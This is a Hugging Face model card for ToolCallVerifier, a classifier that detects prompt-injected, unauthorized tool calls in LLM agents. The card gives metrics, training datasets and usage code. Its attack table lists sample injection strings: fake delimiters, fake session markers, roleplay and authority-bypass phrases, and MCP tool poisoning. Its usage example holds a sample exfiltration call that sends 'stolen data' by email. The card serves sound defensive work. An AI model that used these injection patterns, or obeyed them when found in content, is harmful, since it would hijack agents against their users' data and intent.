tool-call-verifier / README.md
Huamin's picture
Add YAML metadata to model card
0ff2fee verified
metadata
language:
  - en
license: apache-2.0
library_name: transformers
tags:
  - modernbert
  - security
  - jailbreak-detection
  - prompt-injection
  - token-classification
  - tool-calling
  - llm-safety
  - mcp
datasets:
  - microsoft/llmail-inject-challenge
  - allenai/wildjailbreak
  - hackaprompt/hackaprompt-dataset
  - JailbreakBench/JBB-Behaviors
base_model: answerdotai/ModernBERT-base
pipeline_tag: token-classification
model-index:
  - name: tool-call-verifier
    results:
      - task:
          type: token-classification
          name: Unauthorized Tool Call Detection
        metrics:
          - name: UNAUTHORIZED F1
            type: f1
            value: 0.935
          - name: UNAUTHORIZED Precision
            type: precision
            value: 0.9501
          - name: UNAUTHORIZED Recall
            type: recall
            value: 0.9205
          - name: Accuracy
            type: accuracy
            value: 0.9288

ToolCallVerifier - Unauthorized Tool Call Detection

License Model Security

Stage 2 of Two-Stage LLM Agent Defense Pipeline


🎯 What This Model Does

ToolCallVerifier is a ModernBERT-based token classifier that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.

Label Description
AUTHORIZED Token is part of a legitimate, user-requested action
UNAUTHORIZED Token indicates injected/malicious content β€” BLOCK

πŸ“Š Performance

Metric Value
UNAUTHORIZED F1 93.50%
UNAUTHORIZED Precision 95.01%
UNAUTHORIZED Recall 92.05%
Overall Accuracy 92.88%

Confusion Matrix (Token-Level)

                    Predicted
                 AUTH      UNAUTH
Actual AUTH      130,708    8,483
       UNAUTH     13,924   161,031

πŸ—‚οΈ Training Data

Trained on ~30,000 samples combining real-world attacks and synthetic patterns:

HuggingFace Datasets

Dataset Description Samples
LLMail-Inject Microsoft email injection benchmark ~10,000
WildJailbreak Allen AI adversarial safety dataset ~8,000
HackAPrompt EMNLP'23 injection competition ~5,000
JailbreakBench Harmful behavior patterns ~2,000

Synthetic Attack Generators

Generator Description
Adversarial Intent-mismatch attacks (correct tool, wrong args)
Filesystem File/directory operation attacks
Network Network/API exfiltration attacks
Email Email tool hijacking
Financial Transaction manipulation
Code Execution Code injection attacks
Authentication Access control bypass
MCP Attacks Tool poisoning, shadowing, rug pulls

🚨 Attack Categories Covered

Category Source Description
Delimiter Injection LLMail <<end_context>>, >>}}\]\])
Word Obfuscation LLMail Inserting noise words between tokens
Fake Sessions LLMail START_USER_SESSION, EXECUTE_USERQUERY
Roleplay Injection WildJailbreak "You are an admin bot that can..."
XML Tag Injection WildJailbreak <execute_action>, <tool_call>
Authority Bypass WildJailbreak "As administrator, I authorize..."
Intent Mismatch Synthetic User asks X, tool does Y
MCP Tool Poisoning Synthetic Hidden exfiltration in tool args
MCP Shadowing Synthetic Fake authorization context

πŸ’» Usage

from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch

model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)

# Example: Verify a tool call
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'

# Combine for classification
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

with torch.no_grad():
    outputs = model(**inputs)
    predictions = torch.argmax(outputs.logits, dim=-1)

id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]

# Check for unauthorized tokens
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
    print("⚠️ BLOCKED: Unauthorized tool call detected!")
    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
    print("βœ… Tool call authorized")

βš™οΈ Training Configuration

Parameter Value
Base Model answerdotai/ModernBERT-base
Max Length 512 tokens
Batch Size 32
Epochs 5
Learning Rate 3e-5
Loss CrossEntropyLoss (class-weighted)
Class Weights [0.5, 3.0] (AUTHORIZED, UNAUTHORIZED)
Attention SDPA (Flash Attention)
Hardware AMD Instinct MI300X (ROCm)

πŸ”— Integration with FunctionCallSentinel

This model is Stage 2 of a two-stage defense pipeline:

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚   User Prompt   │────▢│ FunctionCallSentinel │────▢│   LLM + Tools   β”‚
β”‚                 β”‚     β”‚      (Stage 1)       β”‚     β”‚                 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜     β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                                              β”‚
                               β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                               β”‚           ToolCallVerifier (This Model)                 β”‚
                               β”‚   Token-level verification before tool execution        β”‚
                               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
Scenario Recommendation
General chatbot Stage 1 only
Tool-calling agent (low risk) Stage 1 only
Tool-calling agent (high risk) Both stages
Email/file system access Both stages
Financial transactions Both stages

🎯 Intended Use

Primary Use Cases

  • LLM Agent Security: Verify tool calls before execution
  • Prompt Injection Defense: Detect unauthorized actions from injected prompts
  • API Gateway Protection: Filter malicious tool calls at infrastructure level

Out of Scope

  • General text classification
  • Non-tool-calling scenarios
  • Languages other than English

⚠️ Limitations

  1. Tool schema dependent β€” Best performance when tool schema is included in input
  2. English only β€” Not tested on other languages
  3. Binary classification β€” No "suspicious" intermediate category (by design, for decisiveness)

πŸ“œ License

Apache 2.0


πŸ”— Links